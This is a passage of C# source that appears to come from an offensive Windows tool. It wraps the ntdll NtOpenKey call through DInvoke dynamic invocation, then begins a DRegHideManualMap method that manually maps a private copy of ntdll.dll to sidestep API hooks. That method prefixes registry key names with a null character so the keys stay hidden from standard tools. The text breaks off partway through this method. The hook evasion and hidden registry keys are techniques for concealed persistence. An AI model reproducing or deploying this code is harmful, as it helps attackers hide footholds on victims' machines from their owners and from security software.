/// <summary>
/// Invokes the <c>NtOpenKey</c> export of <c>ntdll.dll</c> through
/// <c>DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke</c> and hands the resulting
/// key handle back to the caller.
/// </summary>
/// <remarks>
/// This method carries no <c>[DllImport]</c> declaration: the module and export are
/// named by the string literals passed to <c>DynamicAPIInvoke</c>. When reviewing the
/// assembly, those literals and the <c>DELEGATES.NtOpenKey</c> delegate type are the
/// visible references to the native call.
/// </remarks>
/// <param name="keyHandle">Receives the handle value found in the first argument slot after the call.</param>
/// <param name="desiredAccess">Access mask forwarded unchanged to the native call.</param>
/// <param name="objectAttributes">
/// Object attributes forwarded to the native call. The value is passed by copy inside
/// the argument array and is not written back to the caller's variable.
/// </param>
/// <returns>The value returned by the dynamic invocation, cast to <c>NTSTATUS</c>.</returns>
public static DInvoke.Data.Native.NTSTATUS NtOpenKey(
    ref IntPtr keyHandle,
    STRUCTS.ACCESS_MASK desiredAccess,
    ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes)
{
    // Arguments travel as a boxed array; the callee's updates land in this array,
    // not in the caller's variables.
    object[] nativeArgs = new object[]
    {
        keyHandle,
        desiredAccess,
        objectAttributes
    };

    DInvoke.Data.Native.NTSTATUS status =
        (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(
            @"ntdll.dll",
            @"NtOpenKey",
            typeof(DELEGATES.NtOpenKey),
            ref nativeArgs);

    // Only slot 0 (the handle) is copied back out of the argument array.
    keyHandle = (IntPtr)nativeArgs[0];

    return status;
}
public static void DRegHideManualMap(String hive = "HKCU", String subKey = @"\SOFTWARE", String keyName = "", String keyValue = "", bool hiddenKey = false, bool deleteKey = false) { DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP(); mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll"); try { if (hive == "HKLM") { hive = @"\Registry\Machine"; } else if (hive == "HKCU") { String sid = WindowsIdentity.GetCurrent().User.ToString(); hive = @"\Registry\User\" + sid; } else { throw new Exception("Hive needs to be either HKLM or HKCU"); } if (hiddenKey) { keyName = "\0" + keyName; } String regKey = hive + subKey; IntPtr keyHandle = IntPtr.Zero; STRUCTS.OBJECT_ATTRIBUTES oa = new STRUCTS.OBJECT_ATTRIBUTES(); DInvoke.Data.Native.UNICODE_STRING UC_RegKey = new DInvoke.Data.Native.UNICODE_STRING(); string SID = WindowsIdentity.GetCurrent().User.ToString(); DInvoke.DynamicInvoke.Native.RtlInitUnicodeString(ref UC_RegKey, regKey); IntPtr oaObjectName = Marshal.AllocHGlobal(Marshal.SizeOf(UC_RegKey)); Marshal.StructureToPtr(UC_RegKey, oaObjectName, true); oa.Length = Marshal.SizeOf(oa); oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE; oa.objectName = oaObjectName; oa.SecurityDescriptor = IntPtr.Zero; oa.SecurityQualityOfService = IntPtr.Zero; DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS(); ref IntPtr rkeyHandle = ref keyHandle; STRUCTS.ACCESS_MASK desiredAccess = STRUCTS.ACCESS_MASK.KEY_ALL_ACCESS; ref STRUCTS.OBJECT_ATTRIBUTES roa = ref oa;